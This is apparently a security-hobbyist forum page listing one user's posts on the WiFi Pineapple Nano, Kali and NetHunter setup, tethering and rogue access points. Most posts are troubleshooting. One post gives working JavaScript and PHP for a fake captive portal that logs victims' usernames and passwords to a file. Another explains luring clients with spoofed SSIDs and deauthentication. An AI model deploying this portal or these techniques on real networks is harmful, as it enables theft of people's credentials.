Jump to content


Active Members
  • Posts

  • Joined

  • Last visited

Everything posted by jermzz

  1. Seems kinda pointless if you have to physically access the computer you're trying to compromise. If I could do that, there's other ways to get this done. This is supposed to be a remote network sniff scenario.
  2. Salatrip+ was incorporated into MITMf a while ago, along with a dns server. When I tried using it to mitm my home network, hsts still prevailed. No logins, https at the top of all the pages. Can someone explain how bettercap is different?
  3. Since I can't get css files to load, I just use css style tags in splash.html and that works. But if you put your images in /etc/nodogsplash/htdocs/images you should be able to reference them by just using images/image.png. I get background images to load that way. Don't put them in /www if that's how you're trying. Anyway all moot since it will all be changed soon. You can use this temporarily though.
  4. It's really picky about what commands and how you can access files in /www. Still dunno why this script works, but I can't directly access any pages. I can't even find the nodogsplash config file, its just… not there.. heh.
  5. code tag totally wasn't working right from my phone earlier... here's the js / php I was using with evil portal, it uses POST to push username and pass to capture.php and then redir to authtarget. It's not perfect, it makes a nodogsplash token error, but it saves the userdata and authorizes clients to internet. I was gonna fix the error, but I saw that newbie was revamping, so I just stopped using it. Basically I got frustrated I couldn't get anything to work and just took his markV demo portal and built off it to get it to do what I wanted.... Anyway, you'll need to make a stored.txt in /www since the php appends to the file, or it won't work. in splash.html <script type="text/javascript"> function getUrlVars() { var vars = {}; var parts = window.location.href.replace(/[?&]+([^=&]+)=([^&]*)/gi, function(m,key,value) { vars[key] = value; }); return vars; } var fvalsubmit = getUrlVars()["valsubmit"]; if (fvalsubmit == 1) { window.location = "$authtarget"; } function submitTextToCapture() { textuser = document.getElementById("userText").value; textpswd = document.getElementById("userPass").value; text="username-" + textuser + "-password-" + textpswd; window.location = "" + text + "&redir=$authtarget&valsubmit=1"; } </script> <form id="textForm"> <p align="center"> <div style="font-weight:bold;">Enter Username and Password<br> <div align="center"> <input type="text" id="userText" placeholder="Enter your Email" required> <input type="password" id="userPass" placeholder="Enter a Password" required><br> <button type="button" id="button" onclick="submitTextToCapture()"> <b>Connect</b></button> </div> </p> </form> capture.php <?php $text = $_GET["text"]; $redir = $_GET["redir"]; $file = fopen("stored.txt", "a"); fwrite($file, $text . "\n"); fclose($file); echo '<script type="text/javascript">window.location = "' . $redir . '"</script>'; ?>
  6. Also your capture.php is going to throw syntax errors at your closing script tag.
  7. Make sure you have permissions to capture.php. Also make sure you create stored.txt. The php appends, so the file must exist, also with write priv. I got this to work, and modified it to work for password / username capture only clicking one submit button. Can post the script later.
  8. 1 nexus 7 2013 wifi / nethunter 3.0 2 5.0.1 3 LRX22C I believe. 4 yes 5 yes 6 yes iPhone 6 for hotspot to nexus when mobile / determining IP address of nano. Kali 2.0 Linux live USB booted from MacBook Pro. Msi GS70 partitioned for Kali 2.0 Also have used with my nexus 7 2012 running 4.4.4. But I don't use it cause the 2013 is way faster.
  9. Your default gateway is wrong it looks like. Gateway needs to be your router. im guessing. in wp6.sh you should be putting internet: wlan0 pineapple interface: eth1 gateway: this is how my routing looks root@kali:~/Downloads# route Kernel IP routing table Destination Gateway Genmask Flags Metric Ref Use Iface default UG 0 0 0 wlan0 default Pineapple.lan UG 1024 0 0 eth5 * U 0 0 0 wlan0 * U 0 0 0 eth5 root@kali:~/Downloads#
  10. Mine works perfectly. I did at first have the same problem where the VPN tunnel was active but I could not ping the gateway. I had to manually edit the firewall rules on the turtle as described at the end of the video. Have you done that? After fixing the firewall, it works perfectly. I like this much better than having just an ssh to the turtle, as it puts my whole kali laptop on the network instead of just being limited to the turtle's functionality.
  11. Sorry, I should have quoted. I was directing toward Zarabyte, my mistake.
  12. actually that looks pretty good! If the length is accurate, it looks about the same length as an I phone, which I just tested and it fits in the tactical case. Also the thickness looks good, too. There's a good 3/4 in there still once the nano is in.
  13. Here's some shots. Showing pineapple connected and showing it has Internet via update page. A second screen showing build and Kernal, and a third showing its all running on Kali. And all I did was use the wifi pineapple connector app. So now you tell me if it's a hak5 issue or a user issue? EDIT: I'm currently on 5.0.1 for another reason, but it works the same on 5.1.1
  14. It does work in 5.1.1. Click the app, enable tethering, pineapple has Internet. How does it not work? I've done it no less than 3 dozen times now.
  15. I just keep the recon tab open and use another tab for pineAP. I'm sure eventually they'll make a revision to keep the results. But for now it works fine for me to just leave an extra tab open
  16. I swear some people have no idea what Google or a search function is. I put marshmallow on my nexus 7 and found out in 10 minutes that was a mistake and went back to 5.1.1 to use with my nano. No forum thread needed.
  17. You're all doing it wrong then. I have my nano running on Kali 2.0 USB live on my MacBook and Kali 2.0 on my msi laptop. And also Kali nethunter 3.0 on my nexus 7. That's three different installations of Kali all working with my nano. You don't need all these cables connecting your nano to your Laptop. Either plug the male use port directly into the laptop, or use an extension cable if it's next to an exhaust vent. One cable. One. Run wp6.sh and give it the right parameters. Pineapple interface, Internet interface and gateway ip. If you can't figure this out, then you probably shouldn't be using the nano anyway. Bashing a working product for your own lack of understanding is childish and ignorant.
  18. Do you run nethunter on your nexus 6? I'm already tired of either using my hotspot on my iPhone (primary phone) or tethering to my nexus 7. I want to get either a nexus 5 or 6 and put it on my att mobile share plan. If so, how does nethunter run with it? Well? How annoying is it using shell on a smaller screen day to day? I wish I could get my hands on both and play with them. I know my 2012 and 2013 nexus 7's are days apart on speed when running nethunter. Especially metasploit.
  19. Assuming that you're trying to tether your wifi.... (And it's not a mobile connected tablet) This is a known bug they're working on fixing. I have the same problem and I have the same tablet as you. I've tried multiple flavors of kitkat lollipop and marshmallow with the same problem. The temporary work around is to connect to the management interface with a separate device and ssh to the nano and run ifconfig. You'll see the 192.168.x.x ip that the nano is running on. Then on the nexus just go to that ip on the nano port and it should work. The tethering works, just have to figure out what IP the nano is being given from the tablet. I tether mine from the hotspot of my iPhone because it's the only way I can get Internet to the nano on the go.
  20. There's a wifi pineapple app in the android store to tether your pineapple to the Internet through your android phone. You can use your laptop as well if it's running Linux by using the wp6.sh. Windows I hear it's harder to connect. Another way to do it is use a USB dongle on the back of the pineapple and under the network tab you can connect to a hotspot or any wifi with client mode with wlan2.
  21. Not exactly. PineAP will broadcast open SSIDs of any nearby device the pineapple can see. But if that device has never connected to a free-wifi, PineAP will not associate it. When you connect to a free wifi with your phone, tablet or computer, once you've left the covered area of that AP your device will always probe for that wifi. And it will automatically connect when it's in range. PineAP simply sniffs those probes and says "I'm this AP, connect to me!" And you will get clients that way. So at your college, if you connect to the free wifi, you're still only going to get clients that are not already associated to an AP, AND that are probing for formerly connected APs. Other than that it's just a 50/50 which AP they connect to if they're the same SSID. Theoretically, if you name your AP the same SSID as an access point, and deauth them, they will connect to you if your signal out powers the other AP. I've not had much luck doing this with the nano in its stock configuration and antennas though. But I haven't tried so much. Maybe someone else can chime in if they've had success.
  22. I see all clients connected to the open wifi regardless of method. Only time I don't see clients is if connected via management.
  23. I haven't checked but I'm sure the regulatory domain for the pineapple is set to the us. So I'd assume if you're doing this from ssh to the pineapple you'd need to do an iw reg set <country code> could be wrong just guessing.
  24. I love the pineapple juice 4000. I would just wait for it to come back into stock before wasting money one ones that aren't going work well with the tactical case. I plan to grab a couple more when they're back in stock as well. I actually use a small cable to connect the juice to the pineapple on the flap side, then use the 90 to pop out of the bottom of the case and pop my linksys WUSB54GC for an extra card (supports monitor mode) or for client mode as needed. Makes it more of an all-in-one I can put in my jacket or bag.
  • Create New...